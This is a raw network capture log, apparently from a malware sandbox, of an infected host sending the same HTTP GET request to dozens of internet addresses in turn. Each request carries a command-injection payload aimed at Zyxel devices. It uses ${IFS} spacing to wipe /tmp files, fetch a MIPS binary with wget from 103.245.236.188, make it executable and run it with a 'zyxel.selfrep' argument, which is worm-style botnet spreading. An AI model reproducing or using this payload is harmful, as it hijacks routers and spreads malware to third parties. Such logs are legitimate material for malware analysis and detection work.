                                                Jan 12, 2024 18:24:23.537106037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1211192.168.2.13465665.153.168.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537143946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1212192.168.2.1342320178.11.106.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537192106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1213192.168.2.1350530144.84.222.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537242889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1214192.168.2.133836695.1.76.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537296057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1215192.168.2.1336566149.156.151.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537317038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1216192.168.2.1355210117.34.245.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537343025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1217192.168.2.135777865.244.244.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537364960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1218192.168.2.134219467.169.142.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537401915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1219192.168.2.1334868115.112.17.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537441969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1220192.168.2.1354620104.203.97.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537492990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1221192.168.2.135280667.228.156.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537512064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1222192.168.2.134973880.179.184.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537552118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1223192.168.2.134787478.231.18.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537594080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1224192.168.2.1340720174.10.184.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537621021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1225192.168.2.1347870170.198.169.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537667990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1226192.168.2.1336292211.160.209.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537734032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1227192.168.2.1342168144.99.192.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537781954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1228192.168.2.1335752145.22.140.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537817955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1229192.168.2.135556699.99.74.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537859917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1230192.168.2.1358146202.108.213.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537883043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1231192.168.2.1337408159.99.79.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537900925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1232192.168.2.1341170174.62.234.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537961006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1233192.168.2.1342420121.233.201.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537982941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1234192.168.2.1348280190.13.143.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538073063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1235192.168.2.1356708139.30.4.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538093090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1236192.168.2.1343250198.253.17.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538141012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1237192.168.2.1344996207.83.64.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538142920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1238192.168.2.1343770134.94.254.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538227081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1239192.168.2.1360136176.92.253.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538249969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1240192.168.2.1335558189.233.125.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538312912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1241192.168.2.134562863.153.120.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538333893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1242192.168.2.1338108198.0.179.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538343906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1243192.168.2.1359246146.174.207.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538393974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1244192.168.2.135804499.73.25.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538417101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1245192.168.2.133411874.23.216.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538489103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1246192.168.2.1359564203.92.136.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538507938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1247192.168.2.1343016204.8.154.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538531065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1248192.168.2.134144688.60.195.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538580894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1249192.168.2.134261495.127.44.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538630009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1250192.168.2.133612865.200.120.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538655043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1251192.168.2.1341342189.200.6.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538686037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1252192.168.2.133821097.110.116.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538731098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1253192.168.2.134199623.189.42.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538764000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1254192.168.2.1359666153.114.142.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538803101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1255192.168.2.134816496.230.253.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538831949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1256192.168.2.133584893.120.183.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538877010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1257192.168.2.1346990190.183.240.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538918018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1258192.168.2.13337945.82.126.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.538949013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1259192.168.2.134533824.24.232.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539000034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1260192.168.2.133765668.236.29.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539072037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1261192.168.2.134653445.200.67.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539072037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1262192.168.2.1345938107.67.54.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539088964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1263192.168.2.1334262147.174.39.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539150953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1264192.168.2.133911868.124.218.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539208889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1265192.168.2.133394274.182.57.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539236069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1266192.168.2.1341894180.101.61.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539289951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1267192.168.2.1334962166.164.106.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539308071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1268192.168.2.135831032.161.205.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539347887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1269192.168.2.1335460184.254.111.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539398909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1270192.168.2.13609802.37.156.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539436102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1271192.168.2.134847664.37.1.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539470911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1272192.168.2.135070658.114.97.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.539494991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1273192.168.2.1337166191.21.74.16443
                                                TimestampBytes transferredDirectionData
